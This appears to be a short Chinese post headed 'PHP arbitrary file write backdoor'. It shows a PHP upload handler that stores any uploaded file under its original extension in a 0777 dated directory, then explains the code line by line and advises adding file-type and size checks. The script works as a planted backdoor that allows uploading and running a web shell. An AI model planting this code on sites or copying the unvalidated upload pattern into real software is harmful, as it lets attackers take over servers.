php任意文件写入后门

<?php

if(isset($_FILES["myfile"]))

{

$ret = array();

$uploadDir = 'uploads'.DIRECTORY_SEPARATOR.date("Ymd").DIRECTORY_SEPARATOR;

$dir = dirname(__FILE__).DIRECTORY_SEPARATOR.$uploadDir;

file_exists($dir) || (mkdir($dir,0777,true) && chmod($dir,0777));

if(!is_array($_FILES["myfile"]["name"])) //single file

{

$fileName = time().uniqid().'.'.pathinfo($_FILES["myfile"]["name"])['extension'];

move_uploaded_file($_FILES["myfile"]["tmp_name"],$dir.$fileName);

$ret['file'] = DIRECTORY_SEPARATOR.$uploadDir.$fileName;

}

echo json_encode($ret);

}

?>

PHP代码用于处理文件上传的服务器端脚本。让我们分解一下这段代码的功能：

1. 通过条件`isset($_FILES["myfile"])`检查是否已经上传了名为"myfile"的文件。

2. 如果已经上传了文件，它会初始化一个空数组`$ret`，用于存储有关上传文件的信息。

3. 定义了一个`$uploadDir`变量，用于指定上传文件的目标目录。这个目录以日期的形式进行组织，格式为"uploads/YYYYMMDD/"，其中YYYYMMDD代表当前日期。

4. 使用`dirname(__FILE__)`（获取当前脚本的目录）来计算目标目录的完整路径，并将`$uploadDir`附加到它。这将创建一个用于存储上传文件的目录路径。

5. 检查目标目录是否存在。如果不存在，它将使用`mkdir($dir,0777,true)`递归创建目录，并使用`chmod($dir,0777)`设置权限。

6. 使用`is_array($_FILES["myfile"]["name"])`检查上传的文件是单个文件还是文件数组。

7. 如果是单个文件，它会使用`time()`和`uniqid()`生成一个唯一的文件名，并使用`pathinfo($_FILES["myfile"]["name"])['extension']`附加原始文件的扩展名。然后，它将上传的文件从临时位置（存储在`$_FILES["myfile"]["tmp_name"]`中）移动到带有生成文件名的目标目录中。

8. 将上传文件的相对路径存储在`$ret`数组中。

9. 最后，它将`$ret`数组编码为JSON并返回给客户端，提供有关上传文件的信息。

这段代码设计用于处理单个文件的上传，并将它们存储在按日期组织的目录结构中。上传文件的相对路径以JSON响应的形式返回。可以通过修改代码以在处理多个文件上传时循环处理`$_FILES["myfile"]`数组来处理多个文件。此外，您应考虑添加进一步的验证和安全措施，例如检查文件类型和限制文件大小，以增强文件上传过程的安全性。